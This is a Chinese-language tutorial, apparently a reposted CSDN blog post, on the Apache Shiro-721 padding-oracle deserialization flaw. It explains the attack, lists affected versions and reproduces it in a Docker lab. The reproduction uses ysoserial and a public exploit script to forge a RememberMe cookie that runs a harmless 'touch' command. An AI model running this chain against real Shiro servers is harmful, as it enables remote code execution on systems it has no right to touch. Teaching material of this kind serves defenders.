Shiro-721漏洞详解及复现

本文主要是介绍Shiro-721漏洞详解及复现，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

之前有些Shiro-550反序列化漏洞的文章Shiro-550漏洞详解及复现_shiro框架漏洞-CSDN博客

这里简单补充一下关于Shiro-721漏洞的内容。

目录

Shiro-721漏洞原理

Padding Oracle攻击

利用条件

影响版本

漏洞复现

---

Shiro-721漏洞原理

Shiro-721用到的加密方式是AES-128-CBC，跟Shiro-550最大的区别就是AES加密的key基本上猜不到了，是系统随机生成的。

但是这种加密方式容易受到Padding Oracle Attack（填充提示攻击），能够利用有效的RememberMe Cookie作为Padding Oracle Attack的前缀，然后精心构造RememberMe Cookie值可以实现反序列化漏洞攻击。实质是跟Shiro-550一样的。

Padding Oracle攻击

这里的Padding是“填充”的意思，因为对于加密算法来说（如DES），是要进行“填充”形成完整的块然后分段进行加密的。对于密文被解密时也是分段进行的，在解密完成之后算法会先检查是否符合规则，如果它的Padding填充方式不符合规则，那么表示输入数据有问题，会抛出一个Padding Error异常。

Padding Oracle攻击简单理解据说，黑客已知一个合法密文，可以通过不断向网站发送篡改过的密文，观察是否有Padding异常错误提示，如果有异常错误提示即可不断向网站程序提供密文，让解密程序给出错误提示，进而不断地修正，从而最终获得混淆之前的中间密文。拿到中间密文之后，就可以通过构造IV（初始向量），使得中间密文被逆向混淆之后得到的明文为指定内容，从而达到攻击的目的。

在这个过程中，Padding Oracle攻击并没有破解掉加密算法的密钥，也没有能力对任意密文做逆向解密，只是可以利用一个有效的密文，生成一个解密后得到任意指定内容明文的伪造密文。

利用条件

根据上面的眼原理也可以得出利用该漏洞需要以下几个条件：

• 攻击者能够获取到密文，以及IV向量（相对于登录页面的就是知道正确的账号密码对应的Cookie）
• 攻击者能够修改密文触发解密过程，解密成功和解密失败存在差异性（也就是说需要存在Shiro反序列化漏洞，且有类似于登录成功和失败这种差异）

影响版本

该漏洞影响版本为Apache Shiro 
1.2.5
1.2.6
1.3.0
1.3.1
1.3.2
1.4.0-RC2
1.4.0
1.4.1

漏洞复现

基于docker搭建

git clone https://github.com/inspiringz/Shiro-721.git
cd Shiro-721/Docker
docker build -t shiro-721 .
docker run -p 8080:8080 -d shiro-721

 

首先先使用ysoserial工具对恶意语句进行序列化

java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/123" > payload.class

登录成功后将其中的RememberMe字段复制到工具中进行利用：

python2 shiro_exp.py http://192.168.111.121:8080/login.jsp dn02+4V8ELKMLgay8k17HfDtU6eHyvqELqEebUmq5911xfqV2+GsXLDNAgG7qPJc1tQypjGVo/AVhJb5qwhe3vH5LBlqT5GLhz6STPMzvLaFG0xQBCNXsTfRgmBm0K2ZDO5SKW7sgFHmB91ayfrofoifYA5hH3CHYmEtZ7SqH1xEXH4/VT6NBe0h9akLvLyyVqPWkYD4Dv8NGA2EamH1vGSF72f3bEtO/9uBwqF69WVP1PhGB+1fZ7DMtBSsF8YvQkx8DbILhbX+jzItYfllnB/F1GfTPa/lCNTDiOcANaajJfB1i9qacQZvKEGXMeWG4Hx5oaRYm2lvgP/0TrohSJLXPyh1tEJTszxS9hdDhXb6QugkPC57jwT/T4aabZIJs4b05P3Ez+sdOGPtWA4QkxUmfUipigA/KuE1uJ2INRIm3YZlNR1sQ6H64YgJpFu5CrpoCLh2lGBP7Ip8IKeXPwDQpMi8E5gnCBVYBxBUNJ6cs4Y2h+iDpeu/mjAEgkJX payload.class

这里的shiro_exp.py下载地址是：https://github.com/wuppp/shiro_rce_exp

这里是将cookie的RememberMe的部分作为前缀，然后放入工具进行爆破，爆破大概需要一个小时左右，需要耐心等待，爆破成功后就停止，并且返回cookie。

最终跑出的cookie拼接到请求中，可以在/tmp目录下看到创建的文件。

这篇关于Shiro-721漏洞详解及复现的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---